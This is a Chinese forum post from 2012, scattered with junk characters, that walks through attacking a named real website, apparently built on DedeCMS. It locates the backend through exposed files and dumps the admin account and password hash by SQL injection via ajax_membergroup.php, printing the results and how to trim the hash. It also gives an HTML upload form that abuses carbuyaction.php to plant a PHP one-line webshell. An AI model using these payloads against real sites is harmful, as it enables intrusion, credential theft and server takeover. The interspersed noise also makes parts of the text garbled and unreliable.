①注入漏洞。. Y5 B, [) `6 J3 m! Q" {9 b
这站 http://www.political-security.com/
# U6 y5 f2 E9 \5 S, z0 [首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
7 p4 t+ q6 N0 |7 Q2 C5 M3 \www.political-security.com/data/mysql_error_trace.inc 爆后台
8 c& T' G! f' P' L然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。5 h2 T1 |7 I3 E& ^, }
然后写上语句 ( l2 z/ p# p/ f. C4 Y0 @
查看管理员帐号$ v/ _" J* V a- {; B9 |# j7 r- S
http://www.political-security.co ... &membergroup=@`
8 z7 ], @) ]3 e" \$ l# o* }2 }, ? p- K" e. N0 q4 c: s7 l
admin
/ {1 \- z/ ^5 W P% e( S' \3 |1 h! m0 V( {" y q/ ]% {8 O
查看管理员密码
: T# ?1 x# A* }" e$ X$ \ http://www.political-security.co ... &membergroup=@`, b6 l8 ^0 p5 ?7 s
9 f+ ?! k) b3 L9 B) \2 p. g
8d29b1ef9f8c5a5af429
- N9 {0 t4 I; K# ~) ~8 D0 T" h) U
% Z I. E, i9 M7 y" u6 R查看管理员密码
& a6 g. r# f1 ^- @9 ^8 K( L9 O; U( a5 M: a- N8 q
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
- k: x" Q2 M# X! ~ y# x2 l+ ?! C7 a: a2 _* X
8d2
, ^) a) n6 l: s* @1 D5 i2 N& M" v9b1ef9f8c5a5af42
# a8 H {+ q# Y/ X9
# u1 ^% B7 Q! H+ d$ Q. a$ V W3 f
# N: n& B! O. r2 E" A# qcmd5没解出来 只好测试第二个方法1 G+ M. w9 \% M g* C B
@0 r. L G- G0 c9 I; Y9 l6 a
2 v" a x) N/ S% [②上传漏洞:
, d; u/ ]7 w9 M6 w; U# t* [8 L# w& N* e
只要登陆会员中心,然后访问页面链接
7 C- x9 ]: G" ~! ^“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
4 ^1 `" m* ~0 A' J; \7 @; t# s6 q3 v8 s: P' [/ f+ e
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
# B& |1 [ Y+ ^9 {$ G; k% S$ b. b* m: u8 o
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm9 X- l5 G9 ^, E5 n. i! j& [
. r) e e9 T" l4 [' K) C8 s<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
Z$ b1 q' H3 ^3 F# Q或者9 ?6 P, |4 I- Y6 o6 n( j
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对